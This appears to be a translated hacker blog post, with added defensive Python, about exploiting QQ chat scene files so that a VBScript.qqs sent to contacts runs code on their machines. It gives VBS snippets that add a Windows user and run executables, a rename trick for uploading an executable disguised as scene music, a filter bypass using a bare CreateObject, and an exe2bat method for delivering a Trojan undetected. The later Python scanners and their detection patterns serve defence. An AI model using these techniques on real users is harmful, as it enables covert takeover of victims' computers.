Ghost doll: I tested some of them successfully and some failed, and the reason is unknown. Within the same version, some succeed and some fail; for example, with the same beta1, some failed and some succeeded. Of course, you can modify the script in VBScript.qqs to achieve other purposes. Use cases: I am too lazy to map it out; test it yourself.
Source: crab's blog
Extract the three files to \Tencent\QQ\imscene\scene\
Use Notepad to open VBScript.qqs
The code at the bottom
And then send it to others in the scenario.
Download: Qq.rar
Related materials (source: Carved's blog)
Let's take a look at the specific process of the QQ 0day. Maybe someone can make a breakthrough. I explained on my blog that I wasn't showing off; as for this QQ test, I never tested it with people outside, and you said I am a show-off. Again, when I wrote this on my blog, I said that I was still testing and never said that I was using it. I kept getting stuck at the step of executing the file.
Test process:
At the beginning, the instructor and I were testing that the MS player could play SWF files; I wrote an article about it last month. I tested the QQ player but found that this vulnerability could not be triggered, because the player was not the MS player. So later the instructor seemed to have gone off to test other things, and I went on to test this QQ. I made a few packages during the tests a few days ago, including boxes and exe packages; one package causes QQ to crash. This QQ vulnerability should be clear to everyone; let me briefly talk about it.
The problem file is indeed in the QQ scene, where there is an image file, VBScript.qqs, config.qqs, and other files. The specific role of each file is simply to describe the background of the scene. The content of the config.qqs file is:
<?xml version="1.0" encoding="gb2312"?>
<Theme ver="1" guid="8b7a99e866cc454dbe2a7f6238ee8f20">
  <Scene type="1" backgroupcolor="#ffffff" friendcaptioncolor="#0000ff" minecaptioncolor="#000000" msgtextcolor="#000000" systemrequestcolor="#000000" systemresultcolor="#000000">
    <Normal>
      <Sound loop="true" sourcepath="e000001.mp3"/>
    </Normal>
    <Action name="Action 01" type="1">
      <Actiondata>
        <Sound usenormalsound="false" loop="true" sourcepath="e000001.mp3"/>
      </Actiondata>
    </Action>
  </Scene>
</Theme>
Clear at a glance. VBScript.qqs is a script for events such as the animation parameters, initializing the frame animation parameters, initializing the background image location, and re-arranging the scene when the scene window size changes. As the file name suggests, it is a vbs script.
However, this vbs script is not parsed with the vbscript.dll under Windows, but with a vbs*.dll file under the QQ directory. What can vbs do? You know better than I do: vbs downloaders, executing programs, viruses. Powerful functions; adding a user is easy. Here are a few vbs scripts. If you are still interested in this vulnerability, you can test it yourself.
Add user:
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
iReturn = objShell.Run("net user X /add", 0, True)
Run a DOS exe:
Dim ws
Set ws = WScript.CreateObject("WScript.Shell")
iReturn = ws.Run("test.exe", 0, True)
Run a GUI exe:
Dim wsh
Dim js1
js1 = "t1est.exe"
Set wsh = WScript.CreateObject("WScript.Shell")
wsh.Run js1
In addition, if you use vbs to download the file, remember that it must not get killed, because the file was killed during the test and then no file could be transferred. The following describes how to upload arbitrary files. This method succeeded during testing, but it does not seem to succeed today. Method:
This method was also found when studying SWF, because scene creation does not support adding SWF files. Later, I tried to find a solution: create the QQ installation package and add music to it, where the music is the SWF file with its suffix changed. After it is added, it is regenerated into a package. Then use UE or another hex editor, find the MP3 suffix and change it. There may be something to research here, namely why the files it generates must be in QQ's imscene\scene\ directory. If the path here could be changed, it would be okay to write directly into the startup folder. I didn't test this; I'm waiting for you to discover it. Again, it seems that TX has blocked the arbitrary file transfer vulnerability; it is not very clear. Maybe the test has been completed today. If you have any ideas or new ideas about this vulnerability, please follow along and try it together.
------------------------------------------
2. Test + exploitation
1. Upload any file
When testing the SWF Trojan, I wanted to change the MP3 file directly into the SWF file so that the scene player would load it directly. I didn't expect TX to use a player of its own. As for how to upload SWF (or upload any file): I believe everyone is wondering. First get the QQ Scene Editor (on the CD). After installation, change the file to MP3 format; the QQ scene editor cannot recognize other files. Set the background image of the QQ scene, otherwise the white-background dialog turns black and looks wrong at first glance. Then add an action and add music in the property settings, as shown in Figure 1, adding the music with the changed suffix. Then use a hex editor (Figure 2) to edit e000001.mp3 into e000001.exe. In the installation file config.qqs
<Normal>
  <Sound loop="true" sourcepath="e000001.exe"/>
</Normal>
<Action name="Action 01" type="1">
  <Actiondata>
    <Sound usenormalsound="false" loop="false" sourcepath="e000001.exe"/>
change it accordingly (by the time you see this article, TX has probably blocked it).
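As an added defensive example (not code from either blog post or from Tencent; the package layout, the placeholder guid and the file contents are constructed from the config.qqs shown earlier), the following Python script parses a scene's config.qqs, lists every Sound sourcepath, and flags entries whose extension is not an audio type or whose bytes carry an MZ header instead of MP3 audio, which is exactly the mp3-to-exe rename the text describes:

```python
import re
import xml.etree.ElementTree as ET

# Extensions a scene <Sound sourcepath="..."> is expected to reference.
AUDIO_EXTENSIONS = {".mp3", ".wav", ".mid", ".wma"}


def looks_like_mp3(data: bytes) -> bool:
    """Cheap content check: an ID3v2 tag or an MPEG audio frame sync (11 set bits)."""
    if data[:3] == b"ID3":
        return True
    return len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0


def sound_sources(config_bytes: bytes) -> list[str]:
    """Return the distinct sourcepath values of every <Sound> element in config.qqs."""
    # config.qqs declares encoding="gb2312", which expat cannot handle by itself,
    # so decode with the declared encoding and drop the prolog before parsing.
    m = re.match(rb'<\?xml[^>]*encoding="([^"]+)"', config_bytes)
    encoding = m.group(1).decode("ascii") if m else "utf-8"
    text = config_bytes.decode(encoding, errors="replace").strip()
    text = re.sub(r"^<\?xml[^>]*\?>", "", text)
    root = ET.fromstring(text)
    paths = [el.get("sourcepath") for el in root.iter("Sound") if el.get("sourcepath")]
    return list(dict.fromkeys(paths))  # de-duplicate, keep order


def audit_scene(files: dict[str, bytes]) -> list[str]:
    """Audit an unpacked scene (filename -> bytes); return human-readable findings."""
    findings = []
    for path in sound_sources(files["config.qqs"]):
        ext = path[path.rfind("."):].lower() if "." in path else ""
        if ext not in AUDIO_EXTENSIONS:
            findings.append(f"{path}: non-audio extension used as a Sound source")
        payload = files.get(path)
        if payload is None:
            findings.append(f"{path}: referenced by config.qqs but missing from the package")
        elif payload[:2] == b"MZ":
            findings.append(f"{path}: PE executable header (MZ) in a sound slot")
        elif not looks_like_mp3(payload):
            findings.append(f"{path}: content does not look like MP3 audio")
    return findings


# Constructed sample packages (not real QQ scene files); the guid is a placeholder.
CONFIG_TEMPLATE = b"""<?xml version="1.0" encoding="gb2312"?>
<Theme ver="1" guid="PLACEHOLDER-GUID">
  <Scene type="1" backgroupcolor="#ffffff">
    <Normal>
      <Sound loop="true" sourcepath="%s"/>
    </Normal>
    <Action name="Action 01" type="1">
      <Actiondata>
        <Sound usenormalsound="false" loop="false" sourcepath="%s"/>
      </Actiondata>
    </Action>
  </Scene>
</Theme>
"""

BENIGN_SCENE = {
    "config.qqs": CONFIG_TEMPLATE % (b"e000001.mp3", b"e000001.mp3"),
    "e000001.mp3": b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\x00" * 64,  # ID3v2 header stub
}

RENAMED_SCENE = {
    "config.qqs": CONFIG_TEMPLATE % (b"e000001.exe", b"e000001.exe"),
    "e000001.exe": b"MZ\x90\x00" + b"\x00" * 64,  # DOS/PE stub, as a renamed binary would carry
}

if __name__ == "__main__":
    for name, scene in (("benign", BENIGN_SCENE), ("renamed", RENAMED_SCENE)):
        print(name, audit_scene(scene) or ["clean"])
```

To run it over a real unpacked scene, build the dict by reading each file in the scene directory as bytes; the check deliberately trusts neither the extension nor the XML alone, because the rename trick leaves the XML well-formed and only the referenced file's header gives it away.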
2. Run the vbs script.
Friends who have worked on QQ should be familiar with these files, such as config.qqs, setup.ini and VBScript.qqs. If you are interested in the specific functions of the files, you can search for the relevant information on the Internet. Here we will only talk about the VBScript.qqs file. First, let's look at some code:
Code:
'Animation parameters
Dim g_bLoop(1)
Dim g_nMaxTime(1)
Dim g_nImageFrameCount(1, 0)
Dim g_bFrameImageAnimate(1, 0, 0)
Dim g_nFrameImageTime(1, 0, 0)
Dim g_nFrameImageLeft(1, 0, 0)
Dim g_nFrameImageTop(1, 0, 0)
............
Sub Scene_OnInit(cx, cy)
    'Initialize frame animation parameters
    InitData
    g_nCurAction = -1
    g_nCurTime = 0
    ............
    'Initialize the background image location
    Scene_OnSize cx, cy
End Sub
Many of you should know how to use this. Here are the animation parameters and initial parameters for QQ scenes. The role of a vbs script is most clearly shown by a vbs downloader. Here is a simple demonstration. The msgbox function pops up a warning box. Don't underestimate it: handsome guys can use it for some sweet talk, and newbies can use it to scare the veterans. In the code (Figure 3), add msgbox "QQ 0day by: www.522.16.cn", then send it when chatting with others (Figure 4). The scene is accepted by default, but the recipient will see that a transfer is in progress and can cancel it. The average person will not doubt it; it's a TX thing. After the transfer completes, it will be on the other party's side and appear locally (Figure 5).
3. Execute the file
Executing the file is doable. If you directly execute the vbs downloader, an error occurs: the wscript object cannot be found. The reason is that this vbs script is not parsed using the VBScript.dll in Windows, but using a VBScript.dll file in QQ's own directory. Jiajia tested it successfully. The following is a simple example. Jiajia and I were saying that TX filters out some dangerous characters; code like this:
Set objShell = WScript.CreateObject("WScript.Shell")
prompts an error when loading in the QQ scene; changed to:
Set objShell = CreateObject("WScript.Shell"). After testing, it was found that CreateObject("WScript.Shell").Run "C:\1.exe", 0 can be written successfully. Combined with the arbitrary file upload above, good results can be achieved. However, file transfer may greatly extend the time required; sometimes the other party's QQ will crash. Jiajia came up with a good method, which is both undetectable and convenient. Everyone knows about exe2bat. First, CreateObject("Scripting.FileSystemObject") is used to write the code after the transfer through FSO.OpenTextFile, echo it to a file, and then run it with WScript.Shell. Specifically, the bat-to-exe tool turns the Trojan into a bat, as shown in Figure 6, and the code is written to the file through FSO. I have packed the specific files and you will understand them at a glance. If you are still interested in this vulnerability, you can test it on your own, but it is estimated that the vulnerability has been blocked by TX by the time you see this article. Here we package several vbs scripts for research by interested parties. If you have any questions, go to my blog and check it out (www.522.16.cn). At last, I would like to thank my brothers, the instructor, Thirteen, and Jiajia, who helped me in the test.
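The difference between wscript.CreateObject and a bare CreateObject described above is exactly the kind of prefix a receiving-side filter must not depend on. As an added defensive example (not code from the post or from Tencent), this Python scanner reads a VBScript.qqs and reports the lines that instantiate WScript.Shell, Scripting.FileSystemObject, an XMLHTTP downloader object or ADODB.Stream, or that call .Run, .Exec, OpenTextFile or CreateTextFile, matching case-insensitively and tolerating whitespace between tokens. The benign animation lines quoted in the post and a constructed malicious snippet are embedded as sample input; the rule names and the sample file paths are assumptions made for the example.

```python
import re

# Each rule is (name, pattern). Patterns are case-insensitive and allow
# whitespace between tokens, so "wscript. Createobject (" and "CreateObject("
# are both caught; a filter that only strips a "wscript." prefix is not enough.
RULES = [
    ("wscript-shell",
     re.compile(r'createobject\s*\(\s*"\s*wscript\s*\.\s*shell\s*"', re.I)),
    ("filesystem-object",
     re.compile(r'createobject\s*\(\s*"\s*scripting\s*\.\s*filesystemobject\s*"', re.I)),
    ("downloader-object",
     re.compile(r'createobject\s*\(\s*"\s*(msxml2|microsoft)\s*\.\s*(server)?xmlhttp', re.I)),
    ("adodb-stream",
     re.compile(r'createobject\s*\(\s*"\s*adodb\s*\.\s*stream\s*"', re.I)),
    ("run-or-exec",
     re.compile(r'\.\s*(run|exec)\b', re.I)),
    ("file-write",
     re.compile(r'\.\s*(opentextfile|createtextfile)\s*\(', re.I)),
]


def scan_script(script: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for every line matching a rule.

    Lines that are entirely a VBScript comment (leading apostrophe) are skipped;
    comments appended to code lines are left in so that nothing hides behind them.
    """
    hits = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        if line.lstrip().startswith("'"):
            continue
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


# Constructed samples. The benign one mirrors the animation-parameter lines
# quoted in the post; the malicious one mirrors the CreateObject(...).Run form
# the post says got past the filter, followed by an FSO write.
BENIGN_SCRIPT = """'Animation parameters
Dim g_bLoop(1)
Dim g_nMaxTime(1)
Sub Scene_OnInit(cx, cy)
    InitData
    g_nCurAction = -1
    Scene_OnSize cx, cy
End Sub
"""

MALICIOUS_SCRIPT = r"""Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "C:\1.exe", 0, True
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\1.bat", 2, True)
"""

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_SCRIPT), ("malicious", MALICIOUS_SCRIPT)):
        print(label, scan_script(text) or "clean")
```

A legitimate scene script only needs the Scene_OnInit/Scene_OnSize style callbacks and array bookkeeping shown in the post, so any hit from these rules in a received VBScript.qqs is worth quarantining the package over; the scanner reports line numbers so the suspicious statement can be inspected in Notepad directly.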